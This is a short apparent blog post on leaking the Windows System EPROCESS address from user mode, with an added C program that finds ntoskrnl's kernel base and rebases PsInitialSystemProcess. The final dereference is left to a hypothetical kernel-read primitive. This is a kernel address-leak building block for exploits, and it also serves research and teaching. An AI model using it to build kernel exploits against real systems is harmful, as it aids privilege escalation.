C/C++ / Assembly
[2020] Leak EPROCESS/KPROCESS from Usermode
What needs to be done:
1. Use NtQuerySystemInformation with SystemModuleInformation to get the ntoskrnl base address.
2. Load ntoskrnl and get the address of PsInitialSystemProcess.
3. Rebase it so that you get the real kernel address.
4. Read the value at this address; that is the System EPROCESS.
2020-05-28 huoji 1 comment
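The four steps above as one worked program. This is an added example, not the post's own code. Steps 1 to 3 run entirely from user mode; step 4 is only possible with a kernel read primitive (a vulnerable driver, for instance) that the excerpt does not supply, so it is modelled as a hypothetical `kread_fn` callback. The `RTL_PROCESS_MODULES` layout is the well-known 64-bit one, written with fixed-width types so that the list parsing and the rebase arithmetic also compile and run off Windows; `sample_modules()` and the RVA `0xC1E8A0` are constructed data, not real output.

```c
/* Added example (not the blog post's code): steps 1-3 of the excerpt in C. Step 4 needs a
 * kernel read primitive the post does not supply, so it is a hypothetical kread_fn callback. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* SystemModuleInformation (class 11) result, 64-bit layout in fixed-width types. */
typedef struct {
    void    *Section;
    void    *MappedBase;
    void    *ImageBase;         /* kernel virtual address the image is loaded at */
    uint32_t ImageSize;
    uint32_t Flags;
    uint16_t LoadOrderIndex;
    uint16_t InitOrderIndex;
    uint16_t LoadCount;
    uint16_t OffsetToFileName;  /* index of the bare file name inside FullPathName */
    uint8_t  FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION64;
typedef struct {
    uint32_t NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION64 Modules[1]; /* NumberOfModules entries follow */
} RTL_PROCESS_MODULES64;

/* Step 1: find the kernel image by file name (safer than assuming entry 0); 0 if absent. */
uintptr_t find_kernel_base(const RTL_PROCESS_MODULES64 *mods, const char *name)
{
    const RTL_PROCESS_MODULE_INFORMATION64 *m = mods->Modules;
    for (uint32_t i = 0; i < mods->NumberOfModules; i++) {
        if (m[i].OffsetToFileName >= sizeof m[i].FullPathName) continue;
        if (strcmp((const char *)m[i].FullPathName + m[i].OffsetToFileName, name) == 0)
            return (uintptr_t)m[i].ImageBase;
    }
    return 0;
}

/* Step 3: the export keeps its RVA, so slide it from the user-mode base to the kernel base. */
uintptr_t rebase_to_kernel(uintptr_t user_base, uintptr_t user_sym, uintptr_t kernel_base)
{
    return kernel_base + (user_sym - user_base);
}

/* Constructed two-entry module list (not real output) so the parser can run offline. */
const RTL_PROCESS_MODULES64 *sample_modules(void)
{
    static union { RTL_PROCESS_MODULES64 hdr; unsigned char raw[2 * sizeof(RTL_PROCESS_MODULES64)]; } s;
    const char *paths[2] = { "\\SystemRoot\\system32\\hal.dll", "\\SystemRoot\\system32\\ntoskrnl.exe" };
    uintptr_t bases[2] = { 0xfffff80012000000ULL, 0xfffff80012340000ULL };
    RTL_PROCESS_MODULE_INFORMATION64 *m = s.hdr.Modules;
    memset(&s, 0, sizeof s);
    s.hdr.NumberOfModules = 2;
    for (int i = 0; i < 2; i++) {
        m[i].ImageBase = (void *)bases[i];
        strcpy((char *)m[i].FullPathName, paths[i]);
        m[i].OffsetToFileName = (uint16_t)(strrchr(paths[i], '\\') - paths[i] + 1);
    }
    return &s.hdr;
}
#ifdef _WIN32
typedef LONG (NTAPI *NtQSI_t)(ULONG, PVOID, ULONG, PULONG);
typedef int (*kread_fn)(uintptr_t addr, void *out, size_t len); /* hypothetical primitive, 0 = ok */
#define STATUS_INFO_LENGTH_MISMATCH_ ((LONG)0xC0000004L)
/* Steps 1-4 on a live system; kread may be NULL to stop after computing the address. */
uintptr_t leak_system_eprocess(kread_fn kread, uintptr_t *ps_initial_out)
{
    NtQSI_t NtQSI = (NtQSI_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
    RTL_PROCESS_MODULES64 *mods = NULL; ULONG len = 0; LONG st;
    if (!NtQSI) return 0;
    do {                                /* size probe first, then the real query */
        st = NtQSI(11, mods, len, &len);
        if (st == STATUS_INFO_LENGTH_MISMATCH_) { free(mods); mods = malloc(len); }
    } while (st == STATUS_INFO_LENGTH_MISMATCH_ && mods);
    uintptr_t kbase = (st == 0 && mods) ? find_kernel_base(mods, "ntoskrnl.exe") : 0; free(mods);
    if (!kbase) return 0;               /* bases come back zeroed for processes below medium integrity */
    /* Step 2: map ntoskrnl.exe as a plain image (no imports resolved) and resolve the export. */
    HMODULE nt = LoadLibraryExA("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (!nt) return 0;
    uintptr_t sym = (uintptr_t)GetProcAddress(nt, "PsInitialSystemProcess");
    uintptr_t addr = sym ? rebase_to_kernel((uintptr_t)nt, sym, kbase) : 0;
    FreeLibrary(nt);
    if (ps_initial_out) *ps_initial_out = addr;
    /* Step 4: PsInitialSystemProcess is a PEPROCESS variable; the pointer stored there is the System EPROCESS. */
    uintptr_t eprocess = 0;
    if (addr && kread && kread(addr, &eprocess, sizeof eprocess) != 0) eprocess = 0;
    return eprocess;
}
#endif
int main(void)
{
#ifdef _WIN32
    uintptr_t ps = 0, ep = leak_system_eprocess(NULL, &ps);   /* NULL primitive: address only */
    printf("PsInitialSystemProcess 0x%llx, EPROCESS 0x%llx\n", (unsigned long long)ps, (unsigned long long)ep);
#else
    uintptr_t kb = find_kernel_base(sample_modules(), "ntoskrnl.exe"), ub = 0x7ff600000000ULL;
    printf("0x%llx -> 0x%llx\n", (unsigned long long)kb, (unsigned long long)rebase_to_kernel(ub, ub + 0xC1E8A0, kb));
#endif
    return 0;
}
```

Two caveats a practitioner should keep in mind: on Windows 8.1 and later the kernel addresses in the SystemModuleInformation result are zeroed for processes below medium integrity, so the leak only works from a normal (medium or higher) process, and what steps 1 to 3 give you is the kernel address of the PsInitialSystemProcess variable, not the EPROCESS itself; dereferencing it (step 4) still requires a separate kernel read primitive.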